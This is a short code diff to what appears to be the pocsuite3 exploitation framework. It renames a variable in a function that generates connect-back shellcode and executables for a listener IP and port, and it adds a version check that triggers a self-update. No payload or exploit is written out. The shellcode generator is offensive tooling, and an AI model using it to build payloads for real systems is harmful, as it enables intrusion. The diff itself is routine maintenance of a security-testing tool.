@@ -98,7 +98,7 @@ def generate_shellcode_list(listener_ip, listener_port, os_target=OS.WINDOWS, os
     filepath = os.path.join(paths.POCSUITE_TMP_PATH, filename)
     if os_target == OS.WINDOWS:
         filepath = os.path.join(paths.POCSUITE_TMP_PATH, filename) + '.exe'
-    shellcode = s.create_shellcode(
+    _ = s.create_shellcode(
         connection_type,
         encode='',
         make_exe=1,
@@ -268,3 +268,16 @@ def gen_cert(countryName='',
         hard_coded_cert = base64.b64decode(hard_coded_cert_base64)
         with open(filepath, "wb+") as fw:
             fw.write(hard_coded_cert)
+
+
+def minimum_version_required(ver):
+    from pocsuite3 import __version__
+    from pkg_resources import parse_version
+    v1, v2 = parse_version(ver), parse_version(__version__)
+    if v1 > v2:
+        logger.error(f'The minimum version required for this PoC plugin is {ver}, '
+                     f'you installed {__version__}, please upgrade pocsuite3 :)')
+        from pocsuite3.lib.core.data import conf
+        from pocsuite3.lib.core.update import update
+        conf.update_all = True
+        update()
